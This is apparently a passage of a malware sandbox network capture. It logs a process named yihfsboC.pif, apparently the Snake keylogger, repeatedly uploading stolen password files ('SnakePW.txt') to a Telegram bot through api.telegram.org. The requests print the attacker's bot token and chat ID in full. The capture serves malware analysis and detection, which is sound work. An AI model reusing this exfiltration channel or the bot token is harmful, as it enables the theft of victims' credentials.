                                                                                                                2024-11-26 07:25:54 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388918,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605954,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.749877149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:54 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ec9f12dbdf1
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:54 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 63 39 66 31 32 64 62 64 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ec9f12dbdf1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:55 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:55 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:55 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388922,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605955,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.749878149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:54 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f4082f33a4c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:54 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 34 30 38 32 66 33 33 61 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f4082f33a4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:55 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:54 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:55 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388920,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605954,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.749884149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:56 UTC358OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ec250d2c789
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:25:56 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 63 32 35 30 64 32 63 37 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ec250d2c789Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:25:59 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:59 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:59 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388924,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605959,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.749886149.154.167.2204437240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:56 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f519f0d5ca3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:56 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 35 31 39 66 30 64 35 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 34 3a 35 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f519f0d5ca3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:25:59 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:59 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:59 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388926,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605959,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                45192.168.2.749887149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:25:56 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ede0895058a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:25:56 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 64 65 30 38 39 35 30 35 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ede0895058aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:25:59 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:59 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:25:59 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 35 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388925,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605959,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                46192.168.2.749898149.154.167.2204437660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:00 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f08a8cc2626
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:00 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 30 38 61 38 63 63 32 36 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 32 3a 32 35 3a 30 34 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0f08a8cc2626Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:01 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:01 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 36 30 35 39 36 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388929,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605961,"documen


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                47192.168.2.749897149.154.167.2204437924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:26:00 UTC334OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ef55334ac8a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:00 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 65 66 35 35 33 33 34 61 63 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 39 39 35 35 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 31 31 2f 32 30 32 34 20 2f 20 30 34 3a 30 33 3a 31 32 0d 0a 43 6c 69 65 6e 74 20
                                                                                                                Data Ascii: --------------------------8dd0ef55334ac8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:01 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
